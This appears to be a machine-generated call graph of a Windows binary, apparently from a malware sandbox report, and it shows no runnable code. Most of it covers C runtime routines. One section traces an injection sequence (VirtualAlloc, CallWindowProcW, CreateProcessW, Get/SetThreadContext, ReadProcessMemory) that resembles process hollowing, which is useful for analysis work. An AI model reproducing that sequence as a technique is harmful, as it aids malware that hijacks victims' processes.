7260 2654f6 7266 26554b 7260->7266 7264 26550f ___scrt_is_nonwritable_in_current_image 7264->7037 7265->7260 7278 265c6b 7266->7278 7268 265599 7269 265c6b 26 API calls 7268->7269 7270 2655b5 7269->7270 7271 265c6b 26 API calls 7270->7271 7272 2655d3 7271->7272 7273 265503 7272->7273 7274 264676 ___free_lconv_mon 20 API calls 7272->7274 7275 265517 7273->7275 7274->7273 7292 2661eb LeaveCriticalSection 7275->7292 7277 265521 7277->7264 7279 265c7c 7278->7279 7288 265c78 7278->7288 7280 265c96 ___scrt_fastfail 7279->7280 7281 265c83 7279->7281 7285 265cc4 7280->7285 7286 265ccd 7280->7286 7280->7288 7282 26501f __dosmaperr 20 API 
calls 7281->7282 7283 265c88 7282->7283 7284 264f63 _abort 26 API calls 7283->7284 7284->7288 7287 26501f __dosmaperr 20 API calls 7285->7287 7286->7288 7290 26501f __dosmaperr 20 API calls 7286->7290 7289 265cc9 7287->7289 7288->7268 7291 264f63 _abort 26 API calls 7289->7291 7290->7289 7291->7288 7292->7277 7294 264719 7293->7294 7295 26470b 7293->7295 7296 26501f __dosmaperr 20 API calls 7294->7296 7295->7294 7297 264730 7295->7297 7298 264721 7296->7298 7300 26472b 7297->7300 7301 26501f __dosmaperr 20 API calls 7297->7301 7299 264f63 _abort 26 API calls 7298->7299 7299->7300 7300->6957 7301->7298 7306 263ab3 7302->7306 7307 263ae9 7302->7307 7303 263b00 7305 264676 ___free_lconv_mon 20 API calls 7303->7305 7304 264676 ___free_lconv_mon 20 API calls 7304->7307 7305->7306 7306->6956 7307->7303 7307->7304 7311 267432 7308->7311 7312 26744b 7311->7312 7313 2629bb _ValidateLocalCookies 5 API calls 7312->7313 7314 262426 7313->7314 7314->6615 8125 26ab65 8127 26ab8d 8125->8127 8126 26abc5 8127->8126 8128 26abb7 8127->8128 8129 26abbe 8127->8129 8134 26ac37 8128->8134 8138 26ac20 8129->8138 8135 26ac40 8134->8135 8142 26b30f 8135->8142 8139 26ac40 8138->8139 8140 26b30f __startOneArgErrorHandling 21 API calls 8139->8140 8141 26abc3 8140->8141 8144 26b34e __startOneArgErrorHandling 8142->8144 8143 26b3d0 __startOneArgErrorHandling 8150 26b3fa 8143->8150 8155 26362c 8143->8155 8144->8143 8152 26b712 8144->8152 8147 26b406 8149 2629bb _ValidateLocalCookies 5 API calls 8147->8149 8151 26abbc 8149->8151 8150->8147 8159 26ba26 8150->8159 8166 26b735 8152->8166 8157 263654 8155->8157 8156 2629bb _ValidateLocalCookies 5 API calls 8158 263671 8156->8158 8157->8156 8158->8150 8160 26ba48 8159->8160 8162 26ba33 8159->8162 8163 26501f __dosmaperr 20 API calls 8160->8163 8161 26ba4d 8161->8147 8162->8161 8164 26501f __dosmaperr 20 API calls 8162->8164 8163->8161 8165 26ba40 8164->8165 8165->8147 8167 26b760 __raise_exc 8166->8167 8168 26b959 RaiseException 8167->8168 8169 26b730 
8168->8169 8169->8143 8170 266162 8171 26616d 8170->8171 8172 266502 11 API calls 8171->8172 8173 266196 8171->8173 8174 266192 8171->8174 8172->8171 8176 2661ba 8173->8176 8177 2661e6 8176->8177 8178 2661c7 8176->8178 8177->8174 8179 2661d1 DeleteCriticalSection 8178->8179 8179->8177 8179->8179 8180 26b163 8181 26b16d 8180->8181 8182 26b179 8180->8182 8181->8182 8183 26b172 CloseHandle 8181->8183 8183->8182 8517 2621e3 8518 2626b6 _abort GetModuleHandleW 8517->8518 8519 2621eb 8518->8519 8520 2621f7 8519->8520 8521 263f19 _abort 28 API calls 8519->8521 8523 262202 ___scrt_is_nonwritable_in_current_image 8520->8523 8524 263efb 8520->8524 8521->8520 8525 263d28 _abort 28 API calls 8524->8525 8526 263f06 8525->8526 8526->8523 8305 2687a0 8308 2687b7 8305->8308 8309 2687c5 8308->8309 8310 2687d9 8308->8310 8311 26501f __dosmaperr 20 API calls 8309->8311 8312 2687f3 8310->8312 8313 2687e1 8310->8313 8314 2687ca 8311->8314 8316 2647f8 __fassign 38 API calls 8312->8316 8320 2687b2 8312->8320 8315 26501f __dosmaperr 20 API calls 8313->8315 8317 264f63 _abort 26 API calls 8314->8317 8318 2687e6 8315->8318 8316->8320 8317->8320 8319 264f63 _abort 26 API calls 8318->8319 8319->8320 8527 2644ef 8530 263c05 8527->8530 8539 263b8a 8530->8539 8533 263b8a 5 API calls 8534 263c23 8533->8534 8535 263adc 20 API calls 8534->8535 8536 263c2e 8535->8536 8537 263adc 20 API calls 8536->8537 8538 263c39 8537->8538 8540 263ba3 8539->8540 8541 2629bb _ValidateLocalCookies 5 API calls 8540->8541 8542 263bc4 8541->8542 8542->8533 8543 263fed 8544 263ff9 ___scrt_is_nonwritable_in_current_image 8543->8544 8545 264030 ___scrt_is_nonwritable_in_current_image 8544->8545 8551 2661a3 EnterCriticalSection 8544->8551 8547 26400d 8548 2672cc __fassign 20 API calls 8547->8548 8549 26401d 8548->8549 8552 264036 8549->8552 8551->8547 8555 2661eb LeaveCriticalSection 8552->8555 8554 26403d 8554->8545 8555->8554 7660 264537 7661 262cbf ___vcrt_uninitialize 8 API calls 7660->7661 7662 26453e 7661->7662 8556 
d00001 8557 d00005 8556->8557 8558 d043a5 GetPEB 8557->8558 8559 d00190 8558->8559 7663 264b35 7664 264b50 7663->7664 7665 264b40 7663->7665 7669 264b56 7665->7669 7668 264676 ___free_lconv_mon 20 API calls 7668->7664 7670 264b6f 7669->7670 7671 264b69 7669->7671 7673 264676 ___free_lconv_mon 20 API calls 7670->7673 7672 264676 ___free_lconv_mon 20 API calls 7671->7672 7672->7670 7674 264b7b 7673->7674 7675 264676 ___free_lconv_mon 20 API calls 7674->7675 7676 264b86 7675->7676 7677 264676 ___free_lconv_mon 20 API calls 7676->7677 7678 264b91 7677->7678 7679 264676 ___free_lconv_mon 20 API calls 7678->7679 7680 264b9c 7679->7680 7681 264676 ___free_lconv_mon 20 API calls 7680->7681 7682 264ba7 7681->7682 7683 264676 ___free_lconv_mon 20 API calls 7682->7683 7684 264bb2 7683->7684 7685 264676 ___free_lconv_mon 20 API calls 7684->7685 7686 264bbd 7685->7686 7687 264676 ___free_lconv_mon 20 API calls 7686->7687 7688 264bc8 7687->7688 7689 264676 ___free_lconv_mon 20 API calls 7688->7689 7690 264bd6 7689->7690 7695 264a1c 7690->7695 7701 264928 7695->7701 7697 264a40 7698 264a6c 7697->7698 7714 264989 7698->7714 7700 264a90 7700->7668 7702 264934 ___scrt_is_nonwritable_in_current_image 7701->7702 7709 2661a3 EnterCriticalSection 7702->7709 7704 264968 7710 26497d 7704->7710 7705 26493e 7705->7704 7708 264676 ___free_lconv_mon 20 API calls 7705->7708 7707 264975 ___scrt_is_nonwritable_in_current_image 7707->7697 7708->7704 7709->7705 7713 2661eb LeaveCriticalSection 7710->7713 7712 264987 7712->7707 7713->7712 7715 264995 ___scrt_is_nonwritable_in_current_image 7714->7715 7722 2661a3 EnterCriticalSection 7715->7722 7717 26499f 7723 264bff 7717->7723 7719 2649b2 7727 2649c8 7719->7727 7721 2649c0 ___scrt_is_nonwritable_in_current_image 7721->7700 7722->7717 7724 264c0e __fassign 7723->7724 7726 264c35 __fassign 7723->7726 7724->7726 7730 267008 7724->7730 7726->7719 7844 2661eb LeaveCriticalSection 7727->7844 7729 2649d2 7729->7721 7732 267088 7730->7732 7733 26701e 
7730->7733 7734 264676 ___free_lconv_mon 20 API calls 7732->7734 7757 2670d6 7732->7757 7733->7732 7739 264676 ___free_lconv_mon 20 API calls 7733->7739 7740 267051 7733->7740 7735 2670aa 7734->7735 7736 264676 ___free_lconv_mon 20 API calls 7735->7736 7741 2670bd 7736->7741 7737 264676 ___free_lconv_mon 20 API calls 7742 26707d 7737->7742 7738 2670e4 7743 267144 7738->7743 7749 264676 20 API calls ___free_lconv_mon 7738->7749 7744 267046 7739->7744 7745 264676 ___free_lconv_mon 20 API calls 7740->7745 7756 267073 7740->7756 7746 264676 ___free_lconv_mon 20 API calls 7741->7746 7747 264676 ___free_lconv_mon 20 API calls 7742->7747 7748 264676 ___free_lconv_mon 20 API calls 7743->7748 7758 266bc7 7744->7758 7751 267068 7745->7751 7752 2670cb 7746->7752 7747->7732 7753 26714a 7748->7753 7749->7738 7786 266cc5 7751->7786 7755 264676 ___free_lconv_mon 20 API calls 7752->7755 7753->7726 7755->7757 7756->7737 7798 26717b 7757->7798 7759 266bd8 7758->7759 7785 266cc1 7758->7785 7760 266be9 7759->7760 7762 264676 ___free_lconv_mon 20 API calls 7759->7762 7761 266bfb 7760->7761 7763 264676 ___free_lconv_mon 20 API calls 7760->7763 7764 266c0d 7761->7764 7765 264676 ___free_lconv_mon 20 API calls 7761->7765 7762->7760 7763->7761 7766 264676 ___free_lconv_mon 20 API calls 7764->7766 7768 266c1f 7764->7768 7765->7764 7766->7768 7767 266c31 7769 266c43 7767->7769 7771 264676 ___free_lconv_mon 20 API calls 7767->7771 7768->7767 7770 264676 ___free_lconv_mon 20 API calls 7768->7770 7772 266c55 7769->7772 7773 264676 ___free_lconv_mon 20 API calls 7769->7773 7770->7767 7771->7769 7774 266c67 7772->7774 7775 264676 ___free_lconv_mon 20 API calls 7772->7775 7773->7772 7776 266c79 7774->7776 7778 264676 ___free_lconv_mon 20 API calls 7774->7778 7775->7774 7777 266c8b 7776->7777 7779 264676 ___free_lconv_mon 20 API calls 7776->7779 7780 266c9d 7777->7780 7781 264676 ___free_lconv_mon 20 API calls 7777->7781 7778->7776 7779->7777 7782 266caf 7780->7782 7783 264676 ___free_lconv_mon 20 
API calls 7780->7783 7781->7780 7784 264676 ___free_lconv_mon 20 API calls 7782->7784 7782->7785 7783->7782 7784->7785 7785->7740 7787 266cd2 7786->7787 7797 266d2a 7786->7797 7788 266ce2 7787->7788 7789 264676 ___free_lconv_mon 20 API calls 7787->7789 7790 266cf4 7788->7790 7791 264676 ___free_lconv_mon 20 API calls 7788->7791 7789->7788 7792 264676 ___free_lconv_mon 20 API calls 7790->7792 7795 266d06 7790->7795 7791->7790 7792->7795 7793 264676 ___free_lconv_mon 20 API calls 7794 266d18 7793->7794 7796 264676 ___free_lconv_mon 20 API calls 7794->7796 7794->7797 7795->7793 7795->7794 7796->7797 7797->7756 7799 2671a6 7798->7799 7800 267188 7798->7800 7799->7738 7800->7799 7804 266d6a 7800->7804 7803 264676 ___free_lconv_mon 20 API calls 7803->7799 7805 266e48 7804->7805 7806 266d7b 7804->7806 7805->7803 7840 266d2e 7806->7840 7809 266d2e __fassign 20 API calls 7810 266d8e 7809->7810 7811 266d2e __fassign 20 API calls 7810->7811 7812 266d99 7811->7812 7813 266d2e __fassign 20 API calls 7812->7813 7814 266da4 7813->7814 7815 266d2e __fassign 20 API calls 7814->7815 7816 266db2 7815->7816 7817 264676 ___free_lconv_mon 20 API calls 7816->7817 7818 266dbd 7817->7818 7819 264676 ___free_lconv_mon 20 API calls 7818->7819 7820 266dc8 7819->7820 7821 264676 ___free_lconv_mon 20 API calls 7820->7821 7822 266dd3 7821->7822 7823 266d2e __fassign 20 API calls 7822->7823 7824 266de1 7823->7824 7825 266d2e __fassign 20 API calls 7824->7825 7826 266def 7825->7826 7827 266d2e __fassign 20 API calls 7826->7827 7828 266e00 7827->7828 7829 266d2e __fassign 20 API calls 7828->7829 7830 266e0e 7829->7830 7831 266d2e __fassign 20 API calls 7830->7831 7832 266e1c 7831->7832 7833 264676 ___free_lconv_mon 20 API calls 7832->7833 7834 266e27 7833->7834 7835 264676 ___free_lconv_mon 20 API calls 7834->7835 7836 266e32 7835->7836 7837 264676 ___free_lconv_mon 20 API calls 7836->7837 7838 266e3d 7837->7838 7839 264676 ___free_lconv_mon 20 API calls 7838->7839 7839->7805 7841 266d65 7840->7841 
7842 266d55 7840->7842 7841->7809 7842->7841 7843 264676 ___free_lconv_mon 20 API calls 7842->7843 7843->7842 7844->7729 8188 266b75 8189 266b7a 8188->8189 8191 266b9d 8189->8191 8192 2667a5 8189->8192 8193 2667d4 8192->8193 8194 2667b2 8192->8194 8193->8189 8195 2667c0 DeleteCriticalSection 8194->8195 8196 2667ce 8194->8196 8195->8195 8195->8196 8197 264676 ___free_lconv_mon 20 API calls 8196->8197 8197->8193 8560 2666f5 8562 266700 8560->8562 8563 266726 8560->8563 8561 266710 FreeLibrary 8561->8562 8562->8561 8562->8563 7845 262b30 7856 262af0 7845->7856 7857 262b02 7856->7857 7858 262b0f 7856->7858 7859 2629bb _ValidateLocalCookies 5 API calls 7857->7859 7859->7858 8321 263fba GetCommandLineA GetCommandLineW 7860 262706 7861 26273b 7860->7861 7862 262716 7860->7862 7862->7861 7863 26463a 38 API calls 7862->7863 7864 262746 7863->7864 7865 268004 7866 268011 7865->7866 7867 26479b _abort 20 API calls 7866->7867 7868 26802b 7867->7868 7869 264676 ___free_lconv_mon 20 API calls 7868->7869 7870 268037 7869->7870 7871 26479b _abort 20 API calls 7870->7871 7874 26805d 7870->7874 7873 268051 7871->7873 7872 266502 11 API calls 7872->7874 7875 264676 ___free_lconv_mon 20 API calls 7873->7875 7874->7872 7876 268069 7874->7876 7875->7874 8198 268844 8199 2659ba 51 API calls 8198->8199 8200 268849 8199->8200 7328 d01fb5 7380 d04ab5 7328->7380 7331 d02e2b 7332 d04ab5 4 API calls 7333 d02e27 7332->7333 7333->7331 7387 d00005 7333->7387 7335 d02e41 8 API calls 7336 d02f05 7335->7336 7390 d046c5 7336->7390 7339 d046c5 4 API calls 7340 d0300d 7339->7340 7341 d04ab5 4 API calls 7340->7341 7342 d0301a 7341->7342 7343 d03028 7342->7343 7344 d04ab5 4 API calls 7342->7344 7345 d046c5 4 API calls 7343->7345 7346 d03043 7343->7346 7344->7343 7345->7346 7348 d03063 7346->7348 7440 d01e75 7346->7440 7351 d030ca 7348->7351 7399 d01635 7348->7399 7351->7331 7354 d03132 7351->7354 7355 d030fa 7351->7355 7352 d04ab5 4 API calls 7353 d030a1 7352->7353 7353->7351 7356 d04ab5 4 API calls 
7353->7356 7359 d03140 7354->7359 7360 d03178 7354->7360 7357 d046c5 4 API calls 7355->7357 7358 d030af 7356->7358 7372 d03117 7357->7372 7358->7351 7361 d046c5 4 API calls 7358->7361 7362 d046c5 4 API calls 7359->7362 7363 d03186 7360->7363 7364 d031be 7360->7364 7361->7351 7362->7372 7365 d046c5 4 API calls 7363->7365 7367 d03204 7364->7367 7368 d031cc 7364->7368 7365->7372 7366 d03328 ExitProcess 7366->7331 7373 d03212 7367->7373 7374 d03247 7367->7374 7370 d046c5 4 API calls 7368->7370 7370->7372 7371 d03316 7371->7366 7372->7366 7372->7371 7424 d01985 7372->7424 7375 d046c5 4 API calls 7373->7375 7376 d03255 7374->7376 7377 d0328a 7374->7377 7375->7372 7378 d046c5 4 API calls 7376->7378 7379 d046c5 4 API calls 7377->7379 7378->7372 7379->7372 7381 d046c5 4 API calls 7380->7381 7382 d04b46 7381->7382 7383 d046c5 4 API calls 7382->7383 7385 d02e19 7382->7385 7384 d04b7d 7383->7384 7384->7385 7386 d046c5 4 API calls 7384->7386 7385->7331 7385->7332 7386->7384 7443 d043a5 GetPEB 7387->7443 7389 d00190 7389->7335 7445 d04135 GetPEB 7390->7445 7392 d046d0 7393 d0484c VirtualAlloc 7392->7393 7394 d04877 7393->7394 7395 d02fe5 7393->7395 7396 d04135 GetPEB 7394->7396 7397 d0487d 7394->7397 7395->7339 7396->7397 7397->7395 7398 d04938 CallWindowProcW VirtualFree 7397->7398 7398->7395 7400 d046c5 4 API calls 7399->7400 7401 d017d3 7400->7401 7402 d046c5 4 API calls 7401->7402 7403 d0180a 7402->7403 7404 d046c5 4 API calls 7403->7404 7423 d01816 7403->7423 7405 d01837 7404->7405 7405->7423 7447 d00df5 7405->7447 7407 d01896 7410 d046c5 4 API calls 7407->7410 7409 d0184e 7409->7407 7411 d01871 7409->7411 7409->7423 7450 d00395 7409->7450 7412 d018c6 7410->7412 7411->7407 7414 d046c5 4 API calls 7411->7414 7413 d00df5 4 API calls 7412->7413 7412->7423 7415 d018dd 7413->7415 7414->7407 7416 d046c5 4 API calls 7415->7416 7415->7423 7417 d01901 7416->7417 7419 d0192f 7417->7419 7417->7423 7467 d00605 7417->7467 7420 d01954 7419->7420 7421 d046c5 4 API calls 7419->7421 7519 
d00eb5 7420->7519 7421->7420 7423->7351 7423->7352 7437 d01a0d 7424->7437 7425 d01acd CreateProcessW 7426 d01ade GetThreadContext 7425->7426 7431 d01ad9 7425->7431 7427 d01aff ReadProcessMemory 7426->7427 7426->7431 7427->7431 7427->7437 7428 d01e66 7428->7372 7430 d03a35 9 API calls 7430->7437 7431->7428 7628 d03a35 7431->7628 7432 d03c15 9 API calls 7432->7437 7435 d01d7e SetThreadContext 7435->7431 7435->7437 7437->7425 7437->7430 7437->7431 7437->7432 7437->7435 7438 d046c5 4 API calls 7437->7438 7439 d01dde FindCloseChangeNotification 7437->7439 7595 d03ad5 7437->7595 7606 d03645 7437->7606 7617 d03975 7437->7617 7438->7437 7439->7437 7441 d046c5 4 API calls 7440->7441 7442 d01f07 7441->7442 7442->7348 7444 d043cf 7443->7444 7444->7389 7446 d04148 7445->7446 7446->7392 7448 d046c5 4 API calls 7447->7448 7449 d00e83 7448->7449 7449->7409 7451 d00468 7450->7451 7452 d046c5 4 API calls 7451->7452 7453 d00485 7452->7453 7454 d046c5 4 API calls 7453->7454 7455 d0050f 7454->7455 7456 d00005 GetPEB 7455->7456 7457 d0054d 7456->7457 7530 d04675 7457->7530 7460 d005a3 7544 d00205 7460->7544 7461 d00564 7462 d046c5 4 API calls 7461->7462 7464 d0059b 7462->7464 7466 d005d6 7464->7466 7533 d03de5 7464->7533 7466->7409 7468 d0073d 7467->7468 7469 d046c5 4 API calls 7468->7469 7470 d0077c 7469->7470 7471 d046c5 4 API calls 7470->7471 7472 d0079f 7471->7472 7473 d00005 GetPEB 7472->7473 7474 d007d7 7473->7474 7475 d04675 GetPEB 7474->7475 7476 d007ea 7475->7476 7477 d00830 7476->7477 7478 d007ee 7476->7478 7480 d00205 9 API calls 7477->7480 7479 d046c5 4 API calls 7478->7479 7481 d00822 7479->7481 7480->7481 7482 d046c5 4 API calls 7481->7482 7508 d00860 7481->7508 7483 d00886 7482->7483 7484 d046c5 4 API calls 7483->7484 7485 d008b0 7484->7485 7486 d00005 GetPEB 7485->7486 7485->7508 7487 d008cf 7486->7487 7488 d04675 GetPEB 7487->7488 7489 d008e2 7488->7489 7490 d008e6 7489->7490 7491 d0091c 7489->7491 7492 d046c5 4 API calls 7490->7492 7565 d00245 7491->7565 7494 d00914 
7492->7494 7495 d03de5 9 API calls 7494->7495 7494->7508 7496 d0095d 7495->7496 7497 d046c5 4 API calls 7496->7497 7498 d009ad 7497->7498 7499 d00005 GetPEB 7498->7499 7500 d009e8 7499->7500 7501 d04675 GetPEB 7500->7501 7502 d009fb 7501->7502 7503 d00a3b 7502->7503 7504 d009ff 7502->7504 7506 d00205 9 API calls 7503->7506 7505 d046c5 4 API calls 7504->7505 7507 d00a33 7505->7507 7506->7507 7507->7508 7509 d00005 GetPEB 7507->7509 7508->7417 7510 d00a85 7509->7510 7511 d04675 GetPEB 7510->7511 7512 d00a98 7511->7512 7513 d00ad3 7512->7513 7514 d00a9c 7512->7514 7568 d00225 7513->7568 7515 d046c5 4 API calls 7514->7515 7517 d00acb 7515->7517 7517->7508 7518 d03de5 9 API calls 7517->7518 7518->7508 7520 d046c5 4 API calls 7519->7520 7521 d0151b 7520->7521 7522 d046c5 4 API calls 7521->7522 7523 d01542 7522->7523 7524 d046c5 4 API calls 7523->7524 7527 d01554 7523->7527 7525 d0157b 7524->7525 7526 d046c5 4 API calls 7525->7526 7528 d015eb 7526->7528 7527->7423 7528->7527 7571 d00b25 7528->7571 7531 d00005 GetPEB 7530->7531 7532 d00560 7531->7532 7532->7460 7532->7461 7534 d03dfa 7533->7534 7535 d00005 GetPEB 7534->7535 7536 d03e03 7535->7536 7537 d04675 GetPEB 7536->7537 7538 d03e16 7537->7538 7539 d03e52 7538->7539 7540 d03e1a 7538->7540 7560 d04115 7539->7560 7547 d03345 7540->7547 7543 d03e47 7543->7466 7545 d03345 9 API calls 7544->7545 7546 d0020f 7545->7546 7546->7464 7548 d00005 GetPEB 7547->7548 7557 d033e4 7548->7557 7550 d03415 CreateFileW 7556 d03422 7550->7556 7550->7557 7551 d0343e VirtualAlloc 7552 d0345c ReadFile 7551->7552 7551->7556 7555 d0347a VirtualAlloc 7552->7555 7552->7556 7553 d03630 7553->7543 7554 d03622 VirtualFree 7554->7553 7555->7556 7555->7557 7556->7553 7556->7554 7557->7551 7557->7556 7558 d0353f FindCloseChangeNotification 7557->7558 7559 d0354c VirtualFree 7557->7559 7563 d04405 GetPEB 7557->7563 7558->7557 7559->7557 7561 d03345 9 API calls 7560->7561 7562 d0411f 7561->7562 7562->7543 7564 d0442f 7563->7564 7564->7550 7566 d03345 9 
API calls 7565->7566 7567 d0024f 7566->7567 7567->7494 7569 d03345 9 API calls 7568->7569 7570 d0022f 7569->7570 7570->7517 7572 d00c4f 7571->7572 7573 d046c5 4 API calls 7572->7573 7574 d00c7c 7573->7574 7575 d00005 GetPEB 7574->7575 7576 d00cb4 7575->7576 7577 d04675 GetPEB 7576->7577 7578 d00cc7 7577->7578 7579 d00d07 7578->7579 7580 d00ccb 7578->7580 7582 d00205 9 API calls 7579->7582 7581 d046c5 4 API calls 7580->7581 7583 d00cff 7581->7583 7582->7583 7584 d00005 GetPEB 7583->7584 7593 d00d37 7583->7593 7585 d00d51 7584->7585 7586 d04675 GetPEB 7585->7586 7587 d00d64 7586->7587 7588 d00d68 7587->7588 7589 d00d9c 7587->7589 7590 d046c5 4 API calls 7588->7590 7591 d00225 9 API calls 7589->7591 7592 d00d94 7590->7592 7591->7592 7592->7593 7594 d03de5 9 API calls 7592->7594 7593->7528 7594->7593 7596 d03af5 7595->7596 7597 d00005 GetPEB 7596->7597 7598 d03b01 7597->7598 7599 d04675 GetPEB 7598->7599 7600 d03b14 7599->7600 7601 d03bdc 7600->7601 7602 d03b1c 7600->7602 7639 d040d5 7601->7639 7603 d03345 9 API calls 7602->7603 7605 d03bc3 7603->7605 7605->7437 7607 d03662 7606->7607 7608 d00005 GetPEB 7607->7608 7609 d0366b 7608->7609 7610 d04675 GetPEB 7609->7610 7611 d0367e 7610->7611 7612 d03686 7611->7612 7613 d0371c 7611->7613 7615 d03345 9 API calls 7612->7615 7642 d04055 7613->7642 7616 d03703 7615->7616 7616->7437 7618 d03992 7617->7618 7619 d00005 GetPEB 7618->7619 7620 d0399b 7619->7620 7621 d04675 GetPEB 7620->7621 7622 d039ae 7621->7622 7623 d039b2 7622->7623 7624 d039fe 7622->7624 7626 d03345 9 API calls 7623->7626 7645 d04095 7624->7645 7627 d039f3 7626->7627 7627->7437 7629 d03a4a 7628->7629 7630 d00005 GetPEB 7629->7630 7631 d03a53 7630->7631 7632 d04675 GetPEB 7631->7632 7633 d03a66 7632->7633 7634 d03ab6 7633->7634 7635 d03a6a 7633->7635 7648 d040b5 7634->7648 7637 d03345 9 API calls 7635->7637 7638 d03aab 7637->7638 7638->7428 7640 d03345 9 API calls 7639->7640 7641 d040df 7640->7641 7641->7605 7643 d03345 9 API calls 7642->7643 7644 d0405f 
7643->7644 7644->7616 7646 d03345 9 API calls 7645->7646 7647 d0409f 7646->7647 7647->7627 7649 d03345 9 API calls 7648->7649 7650 d040bf 7649->7650 7650->7638 7877 26a400 7880 26a41e 7877->7880 7879 26a416 7881 26a423 7880->7881 7883 26a4b8 7881->7883 7885 26ac73 7881->7885 7883->7879 7886 26ac90 DecodePointer 7885->7886 7887 26aca0 7885->7887 7886->7887 7888 26ad2d 7887->7888 7891 26ad22 7887->7891 7893 26acd7 7887->7893 7888->7891 7892 26501f __dosmaperr 20 API calls 7888->7892 7889 2629bb _ValidateLocalCookies 5 API calls 7890 26a64f 7889->7890 7890->7879 7891->7889 7892->7891 7893->7891 7894 26501f __dosmaperr 20 API calls 7893->7894 7894->7891 7895 268300 7896 268339 7895->7896 7897 26833d 7896->7897 7908 268365 7896->7908 7898 26501f __dosmaperr 20 API calls 7897->7898 7899 268342 7898->7899 7901 264f63 _abort 26 API calls 7899->7901 7900 268689 7902 2629bb _ValidateLocalCookies 5 API calls 7900->7902 7903 26834d 7901->7903 7904 268696 7902->7904 7905 2629bb _ValidateLocalCookies 5 API calls 7903->7905 7906 268359 7905->7906 7908->7900 7909 268220 7908->7909 7912 26823b 7909->7912 7910 2629bb _ValidateLocalCookies 5 API calls 7911 2682b2 7910->7911 7911->7908 7912->7910 8215 264540 8216 26454f 8215->8216 8220 264563 8215->8220 8218 264676 ___free_lconv_mon 20 API calls 8216->8218 8216->8220 8217 264676 ___free_lconv_mon 20 API calls 8219 264575 8217->8219 8218->8220 8221 264676 ___free_lconv_mon 20 API calls 8219->8221 8220->8217 8222 264588 8221->8222 8223 264676 ___free_lconv_mon 20 API calls 8222->8223 8224 264599 8223->8224 8225 264676 ___free_lconv_mon 20 API calls 8224->8225 8226 2645aa 8225->8226 8227 263340 RtlUnwind 8322 269f81 8323 269fa1 8322->8323 8326 269fd8 8323->8326 8325 269fcb 8327 269fdf 8326->8327 8328 269fff 8327->8328 8329 26a040 8327->8329 8330 26ab2e 8328->8330 8333 26ac37 21 API calls 8328->8333 8329->8330 8331 26ac37 21 API calls 8329->8331 8330->8325 8332 26a08e 8331->8332 8332->8325 8334 26ab5e 8333->8334 8334->8325 8564 2621cf 
8567 263477 8564->8567 8568 264cce _abort 20 API calls 8567->8568 8571 26348e 8568->8571 8569 2629bb _ValidateLocalCookies 5 API calls 8570 2621e0 8569->8570 8571->8569 8572 2680cc 8582 268e35 8572->8582 8576 2680d9 8595 269111 8576->8595 8579 268103 8580 264676 ___free_lconv_mon 20 API calls 8579->8580 8581 26810e 8580->8581 8599 268e3e 8582->8599 8584 2680d4 8585 269071 8584->8585 8586 26907d ___scrt_is_nonwritable_in_current_image 8585->8586 8619 2661a3 EnterCriticalSection 8586->8619 8588 2690f3 8633 269108 8588->8633 8590 269088 8590->8588 8592 2690c7 DeleteCriticalSection 8590->8592 8620 26a2bc 8590->8620 8591 2690ff ___scrt_is_nonwritable_in_current_image 8591->8576 8593 264676 ___free_lconv_mon 20 API calls 8592->8593 8593->8590 8596 269127 8595->8596 8598 2680e8 DeleteCriticalSection 8595->8598 8597 264676 ___free_lconv_mon 20 API calls 8596->8597 8596->8598 8597->8598 8598->8576 8598->8579 8600 268e4a ___scrt_is_nonwritable_in_current_image 8599->8600 8609 2661a3 EnterCriticalSection 8600->8609 8602 268eed 8614 268f0d 8602->8614 8606 268e59 8606->8602 8608 268dee 66 API calls 8606->8608 8610 268118 EnterCriticalSection 8606->8610 8611 268ee3 8606->8611 8607 268ef9 ___scrt_is_nonwritable_in_current_image 8607->8584 8608->8606 8609->8606 8610->8606 8617 26812c LeaveCriticalSection 8611->8617 8613 268eeb 8613->8606 8618 2661eb LeaveCriticalSection 8614->8618 8616 268f14 8616->8607 8617->8613 8618->8616 8619->8590 8621 26a2c8 ___scrt_is_nonwritable_in_current_image 8620->8621 8622 26a2ee 8621->8622 8623 26a2d9 8621->8623 8632 26a2e9 ___scrt_is_nonwritable_in_current_image 8622->8632 8636 268118 EnterCriticalSection 8622->8636 8624 26501f __dosmaperr 20 API calls 8623->8624 8625 26a2de 8624->8625 8627 264f63 _abort 26 API calls 8625->8627 8627->8632 8628 26a30a 8637 26a246 8628->8637 8630 26a315 8653 26a332 8630->8653 8632->8590 8901 2661eb LeaveCriticalSection 8633->8901 8635 26910f 8635->8591 8636->8628 8638 26a253 8637->8638 8639 26a268 8637->8639 8640 
26501f __dosmaperr 20 API calls 8638->8640 8651 26a263 8639->8651 8656 268d88 8639->8656 8642 26a258 8640->8642 8644 264f63 _abort 26 API calls 8642->8644 8644->8651 8645 269111 20 API calls 8646 26a284 8645->8646 8662 267fde 8646->8662 8648 26a28a 8669 26afee 8648->8669 8651->8630 8652 264676 ___free_lconv_mon 20 API calls 8652->8651 8900 26812c LeaveCriticalSection 8653->8900 8655 26a33a 8655->8632 8657 268da0 8656->8657 8658 268d9c 8656->8658 8657->8658 8659 267fde 26 API calls 8657->8659 8658->8645 8660 268dc0 8659->8660 8684 269c3d 8660->8684 8663 267fff 8662->8663 8664 267fea 8662->8664 8663->8648 8665 26501f __dosmaperr 20 API calls 8664->8665 8666 267fef 8665->8666 8667 264f63 _abort 26 API calls 8666->8667 8668 267ffa 8667->8668 8668->8648 8670 26b012 8669->8670 8671 26affd 8669->8671 8672 26b04d 8670->8672 8677 26b039 8670->8677 8673 26500c __dosmaperr 20 API calls 8671->8673 8675 26500c __dosmaperr 20 API calls 8672->8675 8674 26b002 8673->8674 8676 26501f __dosmaperr 20 API calls 8674->8676 8678 26b052 8675->8678 8681 26a290 8676->8681 8857 26afc6 8677->8857 8680 26501f __dosmaperr 20 API calls 8678->8680 8682 26b05a 8680->8682 8681->8651 8681->8652 8683 264f63 _abort 26 API calls 8682->8683 8683->8681 8685 269c49 ___scrt_is_nonwritable_in_current_image 8684->8685 8686 269c51 8685->8686 8690 269c69 8685->8690 8709 26500c 8686->8709 8687 269d07 8689 26500c __dosmaperr 20 API calls 8687->8689 8692 269d0c 8689->8692 8690->8687 8693 269c9e 8690->8693 8695 26501f __dosmaperr 20 API calls 8692->8695 8712 266872 EnterCriticalSection 8693->8712 8694 26501f __dosmaperr 20 API calls 8703 269c5e ___scrt_is_nonwritable_in_current_image 8694->8703 8697 269d14 8695->8697 8699 264f63 _abort 26 API calls 8697->8699 8698 269ca4 8700 269cd5 8698->8700 8701 269cc0 8698->8701 8699->8703 8713 269d28 8700->8713 8702 26501f __dosmaperr 20 API calls 8701->8702 8705 269cc5 8702->8705 8703->8658 